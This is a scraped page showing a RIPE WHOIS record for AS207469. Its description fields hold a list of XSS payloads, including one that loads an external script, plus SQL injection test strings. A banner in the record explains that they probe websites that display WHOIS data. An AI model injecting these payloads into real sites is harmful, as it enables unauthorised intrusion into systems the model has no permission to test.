爬虫识别支持 IPv6 地址访问 了解详情
aut-num: 207469 as-name: SUNGYULI descr: </textarea><script>alert(location.href,"XSS! FUX IT.")</script> descr: <script src=http://xss.rocks/xss.js></script> descr: <img src="javascript:alert('XSS! FUX IT.');"> descr: <img src="o" onerror="alert('XSS! FUX IT.')"></img> descr: ' -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: " -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: ` -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: <svg onload=alert%26%230000000040"XSS! FUX IT")> descr: <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'> descr: <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')> descr: <IMG SRC=`javascript:alert("XSS! FUX IT")`> descr: <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\> descr: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> descr: <IMG SRC= onmouseover="alert('xxs')"> descr: <img src=x onerror="& # 0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039& descr: <IMG SRC=& # 106;avascript:alert('XSS'& descr: <IMG SRC="jav ascript:alert('XSS! FUX IT');"> descr: .----------------. .----------------. .----------------. descr: | .--------------. | | .--------------. | | .--------------. | descr: | | ____ ____ | | | | _______ | | | | _______ | | descr: | | |_ _||_ _| | | | | / ___ | | | | | / ___ | | | descr: | | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | | descr: | | > `' < | | | | '.___`-. | | | | '.___`-. | | descr: | | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | | descr: | | |____||____| | | | | |_______.' | | | | |_______.' | | descr: | | | | | | | | | | | | descr: | '--------------' | | '--------------' | | '--------------' | descr: '----------------' '----------------' '----------------' descr: |--------------------------------*---------------------------------| descr: | Hello there! | descr: | Maybe you saw these texts in descr. | descr: | These texts are used to test XSS vulnerability in website :) | descr: | If you see the alert which said 'XSS' or something, | descr: | then maybe the website you are looking at is vulnerable, | descr: | please contact the website owner to fix this :). | descr: | (By the way, there has a SQL injection test too.) | descr: | | descr: | Contact me : noc at sciuridae.network | descr: |------------------------------------------------------------------| org: ORG-SYL2-RIPE import: from AS206499 accept ANY export: to AS206499 announce AS207469 import: from AS31142 accept ANY export: to AS31142 announce AS207469 import: from AS6939 accept ANY export: to AS6939 announce AS207469 import: from AS205591 accept ANY export: to AS205591 announce AS207469 admin-c: SYL9-RIPE tech-c: SYL9-RIPE status: ASSIGNED mnt-by: RIPE-NCC-END-MNT mnt-by: SUNGYULI-MNT created: 2020-01-27T13:58:57Z last-modified: 2021-01-05T15:57:06Z source: RIPE sponsoring-org: ORG-HB116-RIPE
当前 AS207469 不存在任何 IPv4 地址。
IPv6 地址段 | 描述 |
---|---|
2a0f:5707:fff3::/48 | None |